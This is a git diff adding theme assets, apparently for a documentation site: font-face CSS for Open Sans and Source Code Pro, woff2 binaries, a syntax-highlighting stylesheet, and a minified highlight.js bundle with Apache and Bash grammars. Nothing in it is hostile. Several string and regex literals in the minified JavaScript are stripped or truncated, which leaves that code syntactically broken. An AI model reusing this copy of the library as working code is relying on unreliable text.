+/* Open Sans is licensed under the Apache License, Version 2.0. See http://www.apache.org/licenses/LICENSE-2.0 */
+/* Source Code Pro is under the Open Font License. See https://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&id=OFL */
+
+/* open-sans-300 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: normal;
+  font-weight: 300;
+  src: local('Open Sans Light'), local('OpenSans-Light'),
+       url('open-sans-v17-all-charsets-300.woff2') format('woff2');
+}
+
+/* open-sans-300italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: italic;
+  font-weight: 300;
+  src: local('Open Sans Light Italic'), local('OpenSans-LightItalic'),
+       url('open-sans-v17-all-charsets-300italic.woff2') format('woff2');
+}
+
+/* open-sans-regular - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: normal;
+  font-weight: 400;
+  src: local('Open Sans Regular'), local('OpenSans-Regular'),
+       url('open-sans-v17-all-charsets-regular.woff2') format('woff2');
+}
+
+/* open-sans-italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: italic;
+  font-weight: 400;
+  src: local('Open Sans Italic'), local('OpenSans-Italic'),
+       url('open-sans-v17-all-charsets-italic.woff2') format('woff2');
+}
+
+/* open-sans-600 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: normal;
+  font-weight: 600;
+  src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'),
+       url('open-sans-v17-all-charsets-600.woff2') format('woff2');
+}
+
+/* open-sans-600italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: italic;
+  font-weight: 600;
+  src: local('Open Sans SemiBold Italic'), local('OpenSans-SemiBoldItalic'),
+       url('open-sans-v17-all-charsets-600italic.woff2') format('woff2');
+}
+
+/* open-sans-700 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: normal;
+  font-weight: 700;
+  src: local('Open Sans Bold'), local('OpenSans-Bold'),
+       url('open-sans-v17-all-charsets-700.woff2') format('woff2');
+}
+
+/* open-sans-700italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: italic;
+  font-weight: 700;
+  src: local('Open Sans Bold Italic'), local('OpenSans-BoldItalic'),
+       url('open-sans-v17-all-charsets-700italic.woff2') format('woff2');
+}
+
+/* open-sans-800 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: normal;
+  font-weight: 800;
+  src: local('Open Sans ExtraBold'), local('OpenSans-ExtraBold'),
+       url('open-sans-v17-all-charsets-800.woff2') format('woff2');
+}
+
+/* open-sans-800italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Open Sans';
+  font-style: italic;
+  font-weight: 800;
+  src: local('Open Sans ExtraBold Italic'), local('OpenSans-ExtraBoldItalic'),
+       url('open-sans-v17-all-charsets-800italic.woff2') format('woff2');
+}
+
+/* source-code-pro-500 - latin_vietnamese_latin-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+  font-family: 'Source Code Pro';
+  font-style: normal;
+  font-weight: 500;
+  src: url('source-code-pro-v11-all-charsets-500.woff2') format('woff2');
+}
diff --git a/theme/fonts/open-sans-v17-all-charsets-300.woff2 b/theme/fonts/open-sans-v17-all-charsets-300.woff2
new file mode 100644
index 000000000..9f51be370
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-300.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-300italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-300italic.woff2
new file mode 100644
index 000000000..2f5454484
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-300italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-600.woff2 b/theme/fonts/open-sans-v17-all-charsets-600.woff2
new file mode 100644
index 000000000..f503d558d
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-600.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-600italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-600italic.woff2
new file mode 100644
index 000000000..c99aabe80
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-600italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-700.woff2 b/theme/fonts/open-sans-v17-all-charsets-700.woff2
new file mode 100644
index 000000000..421a1ab25
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-700.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-700italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-700italic.woff2
new file mode 100644
index 000000000..12ce3d20d
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-700italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-800.woff2 b/theme/fonts/open-sans-v17-all-charsets-800.woff2
new file mode 100644
index 000000000..c94a223b0
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-800.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-800italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-800italic.woff2
new file mode 100644
index 000000000..eed7d3c63
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-800italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-italic.woff2
new file mode 100644
index 000000000..398b68a08
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-regular.woff2 b/theme/fonts/open-sans-v17-all-charsets-regular.woff2
new file mode 100644
index 000000000..8383e94c6
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-regular.woff2 differ
diff --git a/theme/fonts/source-code-pro-v11-all-charsets-500.woff2 b/theme/fonts/source-code-pro-v11-all-charsets-500.woff2
new file mode 100644
index 000000000..722245682
Binary files /dev/null and b/theme/fonts/source-code-pro-v11-all-charsets-500.woff2 differ
diff --git a/theme/highlight.css b/theme/highlight.css
new file mode 100644
index 000000000..a9559c210
--- /dev/null
+++ b/theme/highlight.css
@@ -0,0 +1,84 @@
+/*
+ * An increased contrast highlighting scheme loosely based on the
+ * "Base16 Atelier Dune Light" theme by Bram de Haan
+ * (http://atelierbram.github.io/syntax-highlighting/atelier-schemes/dune)
+ * Original Base16 color scheme by Chris Kempson
+ * (https://github.com/chriskempson/base16)
+ */
+
+/* Comment */
+.hljs-comment,
+.hljs-quote {
+  color: #575757;
+}
+
+/* Red */
+.hljs-variable,
+.hljs-template-variable,
+.hljs-attribute,
+.hljs-attr,
+.hljs-tag,
+.hljs-name,
+.hljs-regexp,
+.hljs-link,
+.hljs-name,
+.hljs-selector-id,
+.hljs-selector-class {
+  color: #d70025;
+}
+
+/* Orange */
+.hljs-number,
+.hljs-meta,
+.hljs-built_in,
+.hljs-builtin-name,
+.hljs-literal,
+.hljs-type,
+.hljs-params {
+  color: #b21e00;
+}
+
+/* Green */
+.hljs-string,
+.hljs-symbol,
+.hljs-bullet {
+  color: #008200;
+}
+
+/* Blue */
+.hljs-title,
+.hljs-section {
+  color: #0030f2;
+}
+
+/* Purple */
+.hljs-keyword,
+.hljs-selector-tag {
+  color: #9d00ec;
+}
+
+.hljs {
+  display: block;
+  overflow-x: auto;
+  background: #f6f7f6;
+  color: #000;
+  white-space: pre-wrap;
+}
+
+.hljs-emphasis {
+  font-style: italic;
+}
+
+.hljs-strong {
+  font-weight: bold;
+}
+
+.hljs-addition {
+  color: #22863a;
+  background-color: #f0fff4;
+}
+
+.hljs-deletion {
+  color: #b31d28;
+  background-color: #ffeef0;
+}
diff --git a/theme/highlight.js b/theme/highlight.js
new file mode 100644
index 000000000..18d24345b
--- /dev/null
+++ b/theme/highlight.js
@@ -0,0 +1,54 @@
+/*
+  Highlight.js 10.1.1 (93fd0d73)
+  License: BSD-3-Clause
+  Copyright (c) 2006-2020, Ivan Sagalaev
+*/
+var hljs=function(){"use strict";function e(n){Object.freeze(n);var t="function"==typeof n;return Object.getOwnPropertyNames(n).forEach((function(r){!Object.hasOwnProperty.call(n,r)||null===n[r]||"object"!=typeof n[r]&&"function"!=typeof n[r]||t&&("caller"===r||"callee"===r||"arguments"===r)||Object.isFrozen(n[r])||e(n[r])})),n}class n{constructor(e){void 0===e.data&&(e.data={}),this.data=e.data}ignoreMatch(){this.ignore=!0}}function t(e){return e.replace(/&/g,"&").replace(//g,">").replace(/"/g,""").replace(/'/g,"'")}function r(e,...n){var t={};for(const n in e)t[n]=e[n];return n.forEach((function(e){for(const n in e)t[n]=e[n]})),t}function a(e){return e.nodeName.toLowerCase()}var i=Object.freeze({__proto__:null,escapeHTML:t,inherit:r,nodeStream:function(e){var n=[];return function e(t,r){for(var i=t.firstChild;i;i=i.nextSibling)3===i.nodeType?r+=i.nodeValue.length:1===i.nodeType&&(n.push({event:"start",offset:r,node:i}),r=e(i,r),a(i).match(/br|hr|img|input/)||n.push({event:"stop",offset:r,node:i}));return r}(e,0),n},mergeStreams:function(e,n,r){var i=0,s="",o=[];function l(){return e.length&&n.length?e[0].offset!==n[0].offset?e[0].offset"}function u(e){s+=""}function d(e){("start"===e.event?c:u)(e.node)}for(;e.length||n.length;){var g=l();if(s+=t(r.substring(i,g[0].offset)),i=g[0].offset,g===e){o.reverse().forEach(u);do{d(g.splice(0,1)[0]),g=l()}while(g===e&&g.length&&g[0].offset===i);o.reverse().forEach(c)}else"start"===g[0].event?o.push(g[0].node):o.pop(),d(g.splice(0,1)[0])}return s+t(r.substr(i))}});const s="",o=e=>!!e.kind;class l{constructor(e,n){this.buffer="",this.classPrefix=n.classPrefix,e.walk(this)}addText(e){this.buffer+=t(e)}openNode(e){if(!o(e))return;let n=e.kind;e.sublanguage||(n=`${this.classPrefix}${n}`),this.span(n)}closeNode(e){o(e)&&(this.buffer+=s)}value(){return this.buffer}span(e){this.buffer+=``}}class c{constructor(){this.rootNode={children:[]},this.stack=[this.rootNode]}get top(){return this.stack[this.stack.length-1]}get root(){return this.rootNode}add(e){this.top.children.push(e)}openNode(e){const n={kind:e,children:[]};this.add(n),this.stack.push(n)}closeNode(){if(this.stack.length>1)return this.stack.pop()}closeAllNodes(){for(;this.closeNode(););}toJSON(){return JSON.stringify(this.rootNode,null,4)}walk(e){return this.constructor._walk(e,this.rootNode)}static _walk(e,n){return"string"==typeof n?e.addText(n):n.children&&(e.openNode(n),n.children.forEach(n=>this._walk(e,n)),e.closeNode(n)),e}static _collapse(e){"string"!=typeof e&&e.children&&(e.children.every(e=>"string"==typeof e)?e.children=[e.children.join("")]:e.children.forEach(e=>{c._collapse(e)}))}}class u extends c{constructor(e){super(),this.options=e}addKeyword(e,n){""!==e&&(this.openNode(n),this.addText(e),this.closeNode())}addText(e){""!==e&&this.add(e)}addSublanguage(e,n){const t=e.root;t.kind=n,t.sublanguage=!0,this.add(t)}toHTML(){return new l(this,this.options).value()}finalize(){return!0}}function d(e){return e?"string"==typeof e?e:e.source:null}const g="(-?)(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)",h={begin:"\\\\[\\s\\S]",relevance:0},f={className:"string",begin:"'",end:"'",illegal:"\\n",contains:[h]},p={className:"string",begin:'"',end:'"',illegal:"\\n",contains:[h]},b={begin:/\b(a|an|the|are|I'm|isn't|don't|doesn't|won't|but|just|should|pretty|simply|enough|gonna|going|wtf|so|such|will|you|your|they|like|more)\b/},m=function(e,n,t={}){var a=r({className:"comment",begin:e,end:n,contains:[]},t);return a.contains.push(b),a.contains.push({className:"doctag",begin:"(?:TODO|FIXME|NOTE|BUG|OPTIMIZE|HACK|XXX):",relevance:0}),a},v=m("//","$"),x=m("/\\*","\\*/"),E=m("#","$");var _=Object.freeze({__proto__:null,IDENT_RE:"[a-zA-Z]\\w*",UNDERSCORE_IDENT_RE:"[a-zA-Z_]\\w*",NUMBER_RE:"\\b\\d+(\\.\\d+)?",C_NUMBER_RE:g,BINARY_NUMBER_RE:"\\b(0b[01]+)",RE_STARTERS_RE:"!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|-|-=|/=|/|:|;|<<|<<=|<=|<|===|==|=|>>>=|>>=|>=|>>>|>>|>|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~",SHEBANG:(e={})=>{const n=/^#![ ]*\//;return e.binary&&(e.begin=function(...e){return e.map(e=>d(e)).join("")}(n,/.*\b/,e.binary,/\b.*/)),r({className:"meta",begin:n,end:/$/,relevance:0,"on:begin":(e,n)=>{0!==e.index&&n.ignoreMatch()}},e)},BACKSLASH_ESCAPE:h,APOS_STRING_MODE:f,QUOTE_STRING_MODE:p,PHRASAL_WORDS_MODE:b,COMMENT:m,C_LINE_COMMENT_MODE:v,C_BLOCK_COMMENT_MODE:x,HASH_COMMENT_MODE:E,NUMBER_MODE:{className:"number",begin:"\\b\\d+(\\.\\d+)?",relevance:0},C_NUMBER_MODE:{className:"number",begin:g,relevance:0},BINARY_NUMBER_MODE:{className:"number",begin:"\\b(0b[01]+)",relevance:0},CSS_NUMBER_MODE:{className:"number",begin:"\\b\\d+(\\.\\d+)?(%|em|ex|ch|rem|vw|vh|vmin|vmax|cm|mm|in|pt|pc|px|deg|grad|rad|turn|s|ms|Hz|kHz|dpi|dpcm|dppx)?",relevance:0},REGEXP_MODE:{begin:/(?=\/[^/\n]*\/)/,contains:[{className:"regexp",begin:/\//,end:/\/[gimuy]*/,illegal:/\n/,contains:[h,{begin:/\[/,end:/\]/,relevance:0,contains:[h]}]}]},TITLE_MODE:{className:"title",begin:"[a-zA-Z]\\w*",relevance:0},UNDERSCORE_TITLE_MODE:{className:"title",begin:"[a-zA-Z_]\\w*",relevance:0},METHOD_GUARD:{begin:"\\.\\s*[a-zA-Z_]\\w*",relevance:0},END_SAME_AS_BEGIN:function(e){return Object.assign(e,{"on:begin":(e,n)=>{n.data._beginMatch=e[1]},"on:end":(e,n)=>{n.data._beginMatch!==e[1]&&n.ignoreMatch()}})}}),N="of and for in not or if then".split(" ");function w(e,n){return n?+n:function(e){return N.includes(e.toLowerCase())}(e)?0:1}const R=t,y=r,{nodeStream:k,mergeStreams:O}=i,M=Symbol("nomatch");return function(t){var a=[],i={},s={},o=[],l=!0,c=/(^(<[^>]+>|\t|)+|\n)/gm,g="Could not find the language '{}', did you forget to load/include a language module?";const h={disableAutodetect:!0,name:"Plain text",contains:[]};var f={noHighlightRe:/^(no-?highlight)$/i,languageDetectRe:/\blang(?:uage)?-([\w-]+)\b/i,classPrefix:"hljs-",tabReplace:null,useBR:!1,languages:null,__emitter:u};function p(e){return f.noHighlightRe.test(e)}function b(e,n,t,r){var a={code:n,language:e};S("before:highlight",a);var i=a.result?a.result:m(a.language,a.code,t,r);return i.code=a.code,S("after:highlight",i),i}function m(e,t,a,s){var o=t;function c(e,n){var t=E.case_insensitive?n[0].toLowerCase():n[0];return Object.prototype.hasOwnProperty.call(e.keywords,t)&&e.keywords[t]}function u(){null!=y.subLanguage?function(){if(""!==A){var e=null;if("string"==typeof y.subLanguage){if(!i[y.subLanguage])return void O.addText(A);e=m(y.subLanguage,A,!0,k[y.subLanguage]),k[y.subLanguage]=e.top}else e=v(A,y.subLanguage.length?y.subLanguage:null);y.relevance>0&&(I+=e.relevance),O.addSublanguage(e.emitter,e.language)}}():function(){if(!y.keywords)return void O.addText(A);let e=0;y.keywordPatternRe.lastIndex=0;let n=y.keywordPatternRe.exec(A),t="";for(;n;){t+=A.substring(e,n.index);const r=c(y,n);if(r){const[e,a]=r;O.addText(t),t="",I+=a,O.addKeyword(n[0],e)}else t+=n[0];e=y.keywordPatternRe.lastIndex,n=y.keywordPatternRe.exec(A)}t+=A.substr(e),O.addText(t)}(),A=""}function h(e){return e.className&&O.openNode(e.className),y=Object.create(e,{parent:{value:y}})}function p(e){return 0===y.matcher.regexIndex?(A+=e[0],1):(L=!0,0)}var b={};function x(t,r){var i=r&&r[0];if(A+=t,null==i)return u(),0;if("begin"===b.type&&"end"===r.type&&b.index===r.index&&""===i){if(A+=o.slice(r.index,r.index+1),!l){const n=Error("0 width match regex");throw n.languageName=e,n.badRule=b.rule,n}return 1}if(b=r,"begin"===r.type)return function(e){var t=e[0],r=e.rule;const a=new n(r),i=[r.__beforeBegin,r["on:begin"]];for(const n of i)if(n&&(n(e,a),a.ignore))return p(t);return r&&r.endSameAsBegin&&(r.endRe=RegExp(t.replace(/[-/\\^$*+?.()|[\]{}]/g,"\\$&"),"m")),r.skip?A+=t:(r.excludeBegin&&(A+=t),u(),r.returnBegin||r.excludeBegin||(A=t)),h(r),r.returnBegin?0:t.length}(r);if("illegal"===r.type&&!a){const e=Error('Illegal lexeme "'+i+'" for mode "'+(y.className||"")+'"');throw e.mode=y,e}if("end"===r.type){var s=function(e){var t=e[0],r=o.substr(e.index),a=function e(t,r,a){let i=function(e,n){var t=e&&e.exec(n);return t&&0===t.index}(t.endRe,a);if(i){if(t["on:end"]){const e=new n(t);t["on:end"](r,e),e.ignore&&(i=!1)}if(i){for(;t.endsParent&&t.parent;)t=t.parent;return t}}if(t.endsWithParent)return e(t.parent,r,a)}(y,e,r);if(!a)return M;var i=y;i.skip?A+=t:(i.returnEnd||i.excludeEnd||(A+=t),u(),i.excludeEnd&&(A=t));do{y.className&&O.closeNode(),y.skip||y.subLanguage||(I+=y.relevance),y=y.parent}while(y!==a.parent);return a.starts&&(a.endSameAsBegin&&(a.starts.endRe=a.endRe),h(a.starts)),i.returnEnd?0:t.length}(r);if(s!==M)return s}if("illegal"===r.type&&""===i)return 1;if(B>1e5&&B>3*r.index)throw Error("potential infinite loop, way more iterations than matches");return A+=i,i.length}var E=T(e);if(!E)throw console.error(g.replace("{}",e)),Error('Unknown language: "'+e+'"');var _=function(e){function n(n,t){return RegExp(d(n),"m"+(e.case_insensitive?"i":"")+(t?"g":""))}class t{constructor(){this.matchIndexes={},this.regexes=[],this.matchAt=1,this.position=0}addRule(e,n){n.position=this.position++,this.matchIndexes[this.matchAt]=n,this.regexes.push([n,e]),this.matchAt+=function(e){return RegExp(e.toString()+"|").exec("").length-1}(e)+1}compile(){0===this.regexes.length&&(this.exec=()=>null);const e=this.regexes.map(e=>e[1]);this.matcherRe=n(function(e,n="|"){for(var t=/\[(?:[^\\\]]|\\.)*\]|\(\??|\\([1-9][0-9]*)|\\./,r=0,a="",i=0;i0&&(a+=n),a+="(";o.length>0;){var l=t.exec(o);if(null==l){a+=o;break}a+=o.substring(0,l.index),o=o.substring(l.index+l[0].length),"\\"===l[0][0]&&l[1]?a+="\\"+(+l[1]+s):(a+=l[0],"("===l[0]&&r++)}a+=")"}return a}(e),!0),this.lastIndex=0}exec(e){this.matcherRe.lastIndex=this.lastIndex;const n=this.matcherRe.exec(e);if(!n)return null;const t=n.findIndex((e,n)=>n>0&&void 0!==e),r=this.matchIndexes[t];return n.splice(0,t),Object.assign(n,r)}}class a{constructor(){this.rules=[],this.multiRegexes=[],this.count=0,this.lastIndex=0,this.regexIndex=0}getMatcher(e){if(this.multiRegexes[e])return this.multiRegexes[e];const n=new t;return this.rules.slice(e).forEach(([e,t])=>n.addRule(e,t)),n.compile(),this.multiRegexes[e]=n,n}considerAll(){this.regexIndex=0}addRule(e,n){this.rules.push([e,n]),"begin"===n.type&&this.count++}exec(e){const n=this.getMatcher(this.regexIndex);n.lastIndex=this.lastIndex;const t=n.exec(e);return t&&(this.regexIndex+=t.position+1,this.regexIndex===this.count&&(this.regexIndex=0)),t}}function i(e,n){const t=e.input[e.index-1],r=e.input[e.index+e[0].length];"."!==t&&"."!==r||n.ignoreMatch()}if(e.contains&&e.contains.includes("self"))throw Error("ERR: contains `self` is not supported at the top-level of a language.  See documentation.");return function t(s,o){const l=s;if(s.compiled)return l;s.compiled=!0,s.__beforeBegin=null,s.keywords=s.keywords||s.beginKeywords;let c=null;if("object"==typeof s.keywords&&(c=s.keywords.$pattern,delete s.keywords.$pattern),s.keywords&&(s.keywords=function(e,n){var t={};return"string"==typeof e?r("keyword",e):Object.keys(e).forEach((function(n){r(n,e[n])})),t;function r(e,r){n&&(r=r.toLowerCase()),r.split(" ").forEach((function(n){var r=n.split("|");t[r[0]]=[e,w(r[0],r[1])]}))}}(s.keywords,e.case_insensitive)),s.lexemes&&c)throw Error("ERR: Prefer `keywords.$pattern` to `mode.lexemes`, BOTH are not allowed. (see mode reference) ");return l.keywordPatternRe=n(s.lexemes||c||/\w+/,!0),o&&(s.beginKeywords&&(s.begin="\\b("+s.beginKeywords.split(" ").join("|")+")(?=\\b|\\s)",s.__beforeBegin=i),s.begin||(s.begin=/\B|\b/),l.beginRe=n(s.begin),s.endSameAsBegin&&(s.end=s.begin),s.end||s.endsWithParent||(s.end=/\B|\b/),s.end&&(l.endRe=n(s.end)),l.terminator_end=d(s.end)||"",s.endsWithParent&&o.terminator_end&&(l.terminator_end+=(s.end?"|":"")+o.terminator_end)),s.illegal&&(l.illegalRe=n(s.illegal)),void 0===s.relevance&&(s.relevance=1),s.contains||(s.contains=[]),s.contains=[].concat(...s.contains.map((function(e){return function(e){return e.variants&&!e.cached_variants&&(e.cached_variants=e.variants.map((function(n){return r(e,{variants:null},n)}))),e.cached_variants?e.cached_variants:function e(n){return!!n&&(n.endsWithParent||e(n.starts))}(e)?r(e,{starts:e.starts?r(e.starts):null}):Object.isFrozen(e)?r(e):e}("self"===e?s:e)}))),s.contains.forEach((function(e){t(e,l)})),s.starts&&t(s.starts,o),l.matcher=function(e){const n=new a;return e.contains.forEach(e=>n.addRule(e.begin,{rule:e,type:"begin"})),e.terminator_end&&n.addRule(e.terminator_end,{type:"end"}),e.illegal&&n.addRule(e.illegal,{type:"illegal"}),n}(l),l}(e)}(E),N="",y=s||_,k={},O=new f.__emitter(f);!function(){for(var e=[],n=y;n!==E;n=n.parent)n.className&&e.unshift(n.className);e.forEach(e=>O.openNode(e))}();var A="",I=0,S=0,B=0,L=!1;try{for(y.matcher.considerAll();;){B++,L?L=!1:(y.matcher.lastIndex=S,y.matcher.considerAll());const e=y.matcher.exec(o);if(!e)break;const n=x(o.substring(S,e.index),e);S=e.index+n}return x(o.substr(S)),O.closeAllNodes(),O.finalize(),N=O.toHTML(),{relevance:I,value:N,language:e,illegal:!1,emitter:O,top:y}}catch(n){if(n.message&&n.message.includes("Illegal"))return{illegal:!0,illegalBy:{msg:n.message,context:o.slice(S-100,S+100),mode:n.mode},sofar:N,relevance:0,value:R(o),emitter:O};if(l)return{illegal:!1,relevance:0,value:R(o),emitter:O,language:e,top:y,errorRaised:n};throw n}}function v(e,n){n=n||f.languages||Object.keys(i);var t=function(e){const n={relevance:0,emitter:new f.__emitter(f),value:R(e),illegal:!1,top:h};return n.emitter.addText(e),n}(e),r=t;return n.filter(T).filter(I).forEach((function(n){var a=m(n,e,!1);a.language=n,a.relevance>r.relevance&&(r=a),a.relevance>t.relevance&&(r=t,t=a)})),r.language&&(t.second_best=r),t}function x(e){return f.tabReplace||f.useBR?e.replace(c,e=>"\n"===e?f.useBR?"
":e:f.tabReplace?e.replace(/\t/g,f.tabReplace):e):e}function E(e){let n=null;const t=function(e){var n=e.className+" ";n+=e.parentNode?e.parentNode.className:"";const t=f.languageDetectRe.exec(n);if(t){var r=T(t[1]);return r||(console.warn(g.replace("{}",t[1])),console.warn("Falling back to no-highlight mode for this block.",e)),r?t[1]:"no-highlight"}return n.split(/\s+/).find(e=>p(e)||T(e))}(e);if(p(t))return;S("before:highlightBlock",{block:e,language:t}),f.useBR?(n=document.createElement("div")).innerHTML=e.innerHTML.replace(/\n/g,"").replace(//g,"\n"):n=e;const r=n.textContent,a=t?b(t,r,!0):v(r),i=k(n);if(i.length){const e=document.createElement("div");e.innerHTML=a.value,a.value=O(i,k(e),r)}a.value=x(a.value),S("after:highlightBlock",{block:e,result:a}),e.innerHTML=a.value,e.className=function(e,n,t){var r=n?s[n]:t,a=[e.trim()];return e.match(/\bhljs\b/)||a.push("hljs"),e.includes(r)||a.push(r),a.join(" ").trim()}(e.className,t,a.language),e.result={language:a.language,re:a.relevance,relavance:a.relevance},a.second_best&&(e.second_best={language:a.second_best.language,re:a.second_best.relevance,relavance:a.second_best.relevance})}const N=()=>{if(!N.called){N.called=!0;var e=document.querySelectorAll("pre code");a.forEach.call(e,E)}};function T(e){return e=(e||"").toLowerCase(),i[e]||i[s[e]]}function A(e,{languageName:n}){"string"==typeof e&&(e=[e]),e.forEach(e=>{s[e]=n})}function I(e){var n=T(e);return n&&!n.disableAutodetect}function S(e,n){var t=e;o.forEach((function(e){e[t]&&e[t](n)}))}Object.assign(t,{highlight:b,highlightAuto:v,fixMarkup:x,highlightBlock:E,configure:function(e){f=y(f,e)},initHighlighting:N,initHighlightingOnLoad:function(){window.addEventListener("DOMContentLoaded",N,!1)},registerLanguage:function(e,n){var r=null;try{r=n(t)}catch(n){if(console.error("Language definition for '{}' could not be registered.".replace("{}",e)),!l)throw n;console.error(n),r=h}r.name||(r.name=e),i[e]=r,r.rawDefinition=n.bind(null,t),r.aliases&&A(r.aliases,{languageName:e})},listLanguages:function(){return Object.keys(i)},getLanguage:T,registerAliases:A,requireLanguage:function(e){var n=T(e);if(n)return n;throw Error("The '{}' language is required, but not loaded.".replace("{}",e))},autoDetection:I,inherit:y,addPlugin:function(e){o.push(e)}}),t.debugMode=function(){l=!1},t.safeMode=function(){l=!0},t.versionString="10.1.1";for(const n in _)"object"==typeof _[n]&&e(_[n]);return Object.assign(t,_),t}({})}();"object"==typeof exports&&"undefined"!=typeof module&&(module.exports=hljs);
+hljs.registerLanguage("apache",function(){"use strict";return function(e){var n={className:"number",begin:"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}(:\\d{1,5})?"};return{name:"Apache config",aliases:["apacheconf"],case_insensitive:!0,contains:[e.HASH_COMMENT_MODE,{className:"section",begin:"",contains:[n,{className:"number",begin:":\\d{1,5}"},e.inherit(e.QUOTE_STRING_MODE,{relevance:0})]},{className:"attribute",begin:/\w+/,relevance:0,keywords:{nomarkup:"order deny allow setenv rewriterule rewriteengine rewritecond documentroot sethandler errordocument loadmodule options header listen serverroot servername"},starts:{end:/$/,relevance:0,keywords:{literal:"on off all deny allow"},contains:[{className:"meta",begin:"\\s\\[",end:"\\]$"},{className:"variable",begin:"[\\$%]\\{",end:"\\}",contains:["self",{className:"number",begin:"[\\$%]\\d+"}]},n,{className:"number",begin:"\\d+"},e.QUOTE_STRING_MODE]}}],illegal:/\S/}}}());
+hljs.registerLanguage("bash",function(){"use strict";return function(e){const s={};Object.assign(s,{className:"variable",variants:[{begin:/\$[\w\d#@][\w\d_]*/},{begin:/\$\{/,end:/\}/,contains:[{begin:/:-/,contains:[s]}]}]});const t={className:"subst",begin:/\$\(/,end:/\)/,contains:[e.BACKSLASH_ESCAPE]},n={className:"string",begin:/"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,s,t]};t.contains.push(n);const a={begin:/\$\(\(/,end:/\)\)/,contains:[{begin:/\d+#[0-9a-f]+/,className:"number"},e.NUMBER_MODE,s]},i=e.SHEBANG({binary:"(fish|bash|zsh|sh|csh|ksh|tcsh|dash|scsh)",relevance:10}),c={className:"function",begin:/\w[\w\d_]*\s*\(\s*\)\s*\{/,returnBegin:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/\w[\w\d_]*/})],relevance:0};return{name:"Bash",aliases:["sh","zsh"],keywords:{$pattern:/\b-?[a-z\._]+\b/,keyword:"if then else elif fi for while in do done case esac function",literal:"true false",built_in:"break cd continue eval exec exit export getopts hash pwd readonly return shift test times trap umask unset alias bind builtin caller command declare echo enable help let local logout mapfile printf read readarray source type typeset ulimit unalias set shopt autoload bg bindkey bye cap chdir clone comparguments compcall compctl compdescribe compfiles compgroups compquote comptags comptry compvalues dirs disable disown echotc echoti emulate fc fg float functions getcap getln history integer jobs kill limit log noglob popd print pushd pushln rehash sched setcap setopt stat suspend ttyctl unfunction unhash unlimit unsetopt vared wait whence where which zcompile zformat zftp zle zmodload zparseopts zprof zpty zregexparse zsocket zstyle ztcp",_:"-ne -eq -lt -gt -f -d -e -s -l -a"},contains:[i,e.SHEBANG(),c,a,e.HASH_COMMENT_MODE,n,{className:"",begin:/\\"/},{className:"string",begin:/'/,end:/'/},s]}}}());
